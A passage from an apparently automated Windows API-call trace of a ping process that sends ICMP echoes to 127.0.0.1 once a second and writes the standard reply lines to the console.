lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0063.863] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38940 [0063.863] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xf38940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0063.863] _fileno (_File=0x76ea4c28) returned 1 [0063.863] _write (in: _FileHandle=1, _Buf=0xf38940*, _MaxCharCount=0x9 | out: _Buf=0xf38940*) returned 9 [0063.863] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0063.863] _fileno (_File=0x76ea4c28) returned 1 [0063.863] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0063.863] LocalFree (hMem=0xf38940) returned 0x0 [0063.863] LocalFree (hMem=0xf47fa0) returned 0x0 [0063.863] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xdfeef4, nSize=0x0, Arguments=0xdfeef0 | out: lpBuffer="羠ôß➷\x94䰨盪✧") returned 0x9 [0063.863] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0063.863] _fileno (_File=0x76ea4c28) returned 1 [0063.863] _get_osfhandle (_FileHandle=1) returned 0x28 [0063.863] GetFileType (hFile=0x28) returned 0x2 [0063.863] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb8 | out: lpMode=0xdfeeb8) returned 0 [0063.863] GetLastError () returned 0x6 [0063.863] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee1c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0063.863] _fileno (_File=0x76ea4c28) returned 1 [0063.863] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0063.863] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0063.863] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38a30 [0063.863] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xf38a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0063.863] _fileno (_File=0x76ea4c28) returned 1 [0063.863] _write (in: _FileHandle=1, _Buf=0xf38a30*, _MaxCharCount=0x9 | out: _Buf=0xf38a30*) returned 9 [0063.863] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0063.863] _fileno (_File=0x76ea4c28) returned 1 [0063.864] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0063.864] LocalFree (hMem=0xf38a30) returned 0x0 [0063.864] LocalFree (hMem=0xf47fa0) returned 0x0 [0063.864] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⟘\x94䰨盪✨") returned 0x9 [0063.864] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0063.864] _fileno (_File=0x76ea4c28) returned 1 [0063.864] _get_osfhandle (_FileHandle=1) returned 0x28 [0063.864] GetFileType (hFile=0x28) returned 0x2 [0063.864] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0063.864] GetLastError () returned 0x6 [0063.864] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✨") returned 0x0 [0063.864] _fileno (_File=0x76ea4c28) returned 1 [0063.864] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0063.864] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0063.864] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38a30 [0063.864] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xf38a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0063.864] _fileno (_File=0x76ea4c28) returned 1 [0063.864] _write (in: _FileHandle=1, _Buf=0xf38a30*, _MaxCharCount=0x9 | out: _Buf=0xf38a30*) returned 9 [0063.864] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0063.864] _fileno (_File=0x76ea4c28) returned 1 [0063.864] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0063.864] LocalFree (hMem=0xf38a30) returned 0x0 [0063.864] LocalFree (hMem=0xf47fa0) returned 0x0 [0063.864] Sleep (dwMilliseconds=0x3e8) [0064.880] IcmpSendEcho2Ex (in: IcmpHandle=0xf36b48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xf3c200, RequestSize=0x20, RequestOptions=0xdfef6c, ReplyBuffer=0xf45270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xf45270) returned 0x1 [0064.881] InetNtopW (in: Family=2, pAddr=0xdfef5c, pStringBuf=0xdff084, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0064.881] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⛔\x94䰨盪✣") returned 0x16 [0064.881] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0064.881] _fileno (_File=0x76ea4c28) returned 1 [0064.881] _get_osfhandle (_FileHandle=1) returned 0x28 [0064.881] GetFileType (hFile=0x28) returned 0x2 [0064.881] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0064.881] GetLastError () returned 0x6 [0064.881] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✣") returned 0x0 [0064.881] _fileno (_File=0x76ea4c28) returned 1 [0064.881] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0064.881] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0064.881] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xf47fd8 [0064.881] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xf47fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0064.881] _fileno (_File=0x76ea4c28) returned 1 [0064.881] _write (in: _FileHandle=1, _Buf=0xf47fd8*, _MaxCharCount=0x16 | out: _Buf=0xf47fd8*) returned 22 [0064.881] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0064.881] _fileno (_File=0x76ea4c28) returned 1 [0064.881] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0064.881] LocalFree (hMem=0xf47fd8) returned 0x0 [0064.881] LocalFree (hMem=0xf47fa0) returned 0x0 [0064.881] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⛿\x94䰨盪✼") returned 0x9 [0064.881] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0064.881] _fileno (_File=0x76ea4c28) returned 1 [0064.881] _get_osfhandle (_FileHandle=1) returned 0x28 [0064.881] GetFileType (hFile=0x28) returned 0x2 [0064.881] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0064.881] GetLastError () returned 0x6 [0064.882] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✼") returned 0x0 [0064.882] _fileno (_File=0x76ea4c28) returned 1 [0064.882] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0064.882] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0064.882] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf389a0 [0064.882] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xf389a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0064.882] _fileno (_File=0x76ea4c28) returned 1 [0064.882] _write (in: _FileHandle=1, _Buf=0xf389a0*, _MaxCharCount=0x9 | out: _Buf=0xf389a0*) returned 9 [0064.882] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0064.882] _fileno (_File=0x76ea4c28) returned 1 [0064.882] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0064.882] LocalFree (hMem=0xf389a0) returned 0x0 [0064.882] LocalFree (hMem=0xf47fa0) returned 0x0 [0064.882] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xdfeef4, nSize=0x0, Arguments=0xdfeef0 | out: lpBuffer="羠ôß➷\x94䰨盪✧") returned 0x9 [0064.882] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0064.882] _fileno (_File=0x76ea4c28) returned 1 [0064.882] _get_osfhandle (_FileHandle=1) returned 0x28 [0064.882] GetFileType (hFile=0x28) returned 0x2 [0064.882] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb8 | out: lpMode=0xdfeeb8) returned 0 [0064.882] GetLastError () returned 0x6 [0064.882] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee1c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0064.882] _fileno (_File=0x76ea4c28) returned 1 [0064.882] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0064.882] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0064.882] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38940 [0064.882] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xf38940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0064.882] _fileno (_File=0x76ea4c28) returned 1 [0064.882] _write (in: _FileHandle=1, _Buf=0xf38940*, _MaxCharCount=0x9 | out: _Buf=0xf38940*) returned 9 [0064.882] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0064.882] _fileno (_File=0x76ea4c28) returned 1 [0064.882] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0064.882] LocalFree (hMem=0xf38940) returned 0x0 [0064.882] LocalFree (hMem=0xf47fa0) returned 0x0 [0064.882] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⟘\x94䰨盪✨") returned 0x9 [0064.882] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0064.882] _fileno (_File=0x76ea4c28) returned 1 [0064.882] _get_osfhandle (_FileHandle=1) returned 0x28 [0064.882] GetFileType (hFile=0x28) returned 0x2 [0064.882] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0064.882] GetLastError () returned 0x6 [0064.882] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✨") returned 0x0 [0064.882] _fileno (_File=0x76ea4c28) returned 1 [0064.882] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0064.882] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0064.883] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38a30 [0064.883] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xf38a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0064.883] _fileno (_File=0x76ea4c28) returned 1 [0064.883] _write (in: _FileHandle=1, _Buf=0xf38a30*, _MaxCharCount=0x9 | out: _Buf=0xf38a30*) returned 9 [0064.883] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0064.883] _fileno (_File=0x76ea4c28) returned 1 [0064.883] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0064.883] LocalFree (hMem=0xf38a30) returned 0x0 [0064.883] LocalFree (hMem=0xf47fa0) returned 0x0 [0064.883] Sleep (dwMilliseconds=0x3e8) [0065.896] IcmpSendEcho2Ex (in: IcmpHandle=0xf36b48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xf3c200, RequestSize=0x20, RequestOptions=0xdfef6c, ReplyBuffer=0xf45270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xf45270) returned 0x1 [0065.897] InetNtopW (in: Family=2, pAddr=0xdfef5c, pStringBuf=0xdff084, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0065.897] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⛔\x94䰨盪✣") returned 0x16 [0065.897] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0065.897] _fileno (_File=0x76ea4c28) returned 1 [0065.897] _get_osfhandle (_FileHandle=1) returned 0x28 [0065.897] GetFileType (hFile=0x28) returned 0x2 [0065.897] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0065.897] GetLastError () returned 0x6 [0065.897] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✣") returned 0x0 [0065.897] _fileno (_File=0x76ea4c28) returned 1 [0065.897] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0065.897] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0065.897] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xf48100 [0065.897] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xf48100, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0065.897] _fileno (_File=0x76ea4c28) returned 1 [0065.897] _write (in: _FileHandle=1, _Buf=0xf48100*, _MaxCharCount=0x16 | out: _Buf=0xf48100*) returned 22 [0065.897] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0065.897] _fileno (_File=0x76ea4c28) returned 1 [0065.897] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0065.897] LocalFree (hMem=0xf48100) returned 0x0 [0065.897] LocalFree (hMem=0xf47fa0) returned 0x0 [0065.897] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="菠ôß⛿\x94䰨盪✼") returned 0x9 [0065.897] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0065.897] _fileno (_File=0x76ea4c28) returned 1 [0065.897] _get_osfhandle (_FileHandle=1) returned 0x28 [0065.897] GetFileType (hFile=0x28) returned 0x2 [0065.897] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0065.897] GetLastError () returned 0x6 [0065.897] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✼") returned 0x0 [0065.897] _fileno (_File=0x76ea4c28) returned 1 [0065.897] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0065.897] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0065.897] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf389a0 [0065.897] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xf389a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0065.897] _fileno (_File=0x76ea4c28) returned 1 [0065.897] _write (in: _FileHandle=1, _Buf=0xf389a0*, _MaxCharCount=0x9 | out: _Buf=0xf389a0*) returned 9 [0065.897] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0065.897] _fileno (_File=0x76ea4c28) returned 1 [0065.897] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0065.897] LocalFree (hMem=0xf389a0) returned 0x0 [0065.898] LocalFree (hMem=0xf483e0) returned 0x0 [0065.898] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xdfeef4, nSize=0x0, Arguments=0xdfeef0 | out: lpBuffer="菠ôß➷\x94䰨盪✧") returned 0x9 [0065.898] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0065.898] _fileno (_File=0x76ea4c28) returned 1 [0065.898] _get_osfhandle (_FileHandle=1) returned 0x28 [0065.898] GetFileType (hFile=0x28) returned 0x2 [0065.898] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb8 | out: lpMode=0xdfeeb8) returned 0 [0065.898] GetLastError () returned 0x6 [0065.898] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee1c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0065.898] _fileno (_File=0x76ea4c28) returned 1 [0065.898] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0065.898] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0065.898] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38a60 [0065.898] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xf38a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0065.898] _fileno (_File=0x76ea4c28) returned 1 [0065.898] _write (in: _FileHandle=1, _Buf=0xf38a60*, _MaxCharCount=0x9 | out: _Buf=0xf38a60*) returned 9 [0065.898] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0065.898] _fileno (_File=0x76ea4c28) returned 1 [0065.898] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0065.898] LocalFree (hMem=0xf38a60) returned 0x0 [0065.898] LocalFree (hMem=0xf483e0) returned 0x0 [0065.898] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="菠ôß⟘\x94䰨盪✨") returned 0x9 [0065.898] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0065.898] _fileno (_File=0x76ea4c28) returned 1 [0065.898] _get_osfhandle (_FileHandle=1) returned 0x28 [0065.898] GetFileType (hFile=0x28) returned 0x2 [0065.898] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0065.898] GetLastError () returned 0x6 [0065.898] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✨") returned 0x0 [0065.898] _fileno (_File=0x76ea4c28) returned 1 [0065.898] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0065.898] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0065.898] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38aa8 [0065.898] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xf38aa8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0065.898] _fileno (_File=0x76ea4c28) returned 1 [0065.898] _write (in: _FileHandle=1, _Buf=0xf38aa8*, _MaxCharCount=0x9 | out: _Buf=0xf38aa8*) returned 9 [0065.898] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0065.898] _fileno (_File=0x76ea4c28) returned 1 [0065.898] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0065.898] LocalFree (hMem=0xf38aa8) returned 0x0 [0065.898] LocalFree (hMem=0xf483e0) returned 0x0 [0065.898] Sleep (dwMilliseconds=0x3e8) [0066.912] IcmpSendEcho2Ex (in: IcmpHandle=0xf36b48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xf3c200, RequestSize=0x20, RequestOptions=0xdfef6c, ReplyBuffer=0xf45270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xf45270) returned 0x1 [0066.912] InetNtopW (in: Family=2, pAddr=0xdfef5c, pStringBuf=0xdff084, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0066.912] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⛔\x94䰨盪✣") returned 0x16 [0066.912] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0066.912] _fileno (_File=0x76ea4c28) returned 1 [0066.912] _get_osfhandle (_FileHandle=1) returned 0x28 [0066.912] GetFileType (hFile=0x28) returned 0x2 [0066.912] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0066.912] GetLastError () returned 0x6 [0066.912] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✣") returned 0x0 [0066.913] _fileno (_File=0x76ea4c28) returned 1 [0066.913] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0066.913] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0066.913] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xf48020 [0066.913] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xf48020, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0066.913] _fileno (_File=0x76ea4c28) returned 1 [0066.913] _write (in: _FileHandle=1, _Buf=0xf48020*, _MaxCharCount=0x16 | out: _Buf=0xf48020*) returned 22 [0066.913] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0066.913] _fileno (_File=0x76ea4c28) returned 1 [0066.913] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0066.913] LocalFree (hMem=0xf48020) returned 0x0 [0066.913] LocalFree (hMem=0xf47fa0) returned 0x0 [0066.913] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="菠ôß⛿\x94䰨盪✼") returned 0x9 [0066.913] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0066.913] _fileno (_File=0x76ea4c28) returned 1 [0066.913] _get_osfhandle (_FileHandle=1) returned 0x28 [0066.913] GetFileType (hFile=0x28) returned 0x2 [0066.913] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0066.913] GetLastError () returned 0x6 [0066.913] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✼") returned 0x0 [0066.913] _fileno (_File=0x76ea4c28) returned 1 [0066.913] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0066.913] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0066.913] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38940 [0066.913] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xf38940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0066.913] _fileno (_File=0x76ea4c28) returned 1 [0066.913] _write (in: _FileHandle=1, _Buf=0xf38940*, _MaxCharCount=0x9 | out: _Buf=0xf38940*) returned 9 [0066.913] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0066.913] _fileno (_File=0x76ea4c28) returned 1 [0066.913] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0066.913] LocalFree (hMem=0xf38940) returned 0x0 [0066.913] LocalFree (hMem=0xf483e0) returned 0x0 [0066.913] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xdfeef4, nSize=0x0, Arguments=0xdfeef0 | out: lpBuffer="菠ôß➷\x94䰨盪✧") returned 0x9 [0066.913] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0066.913] _fileno (_File=0x76ea4c28) returned 1 [0066.913] _get_osfhandle (_FileHandle=1) returned 0x28 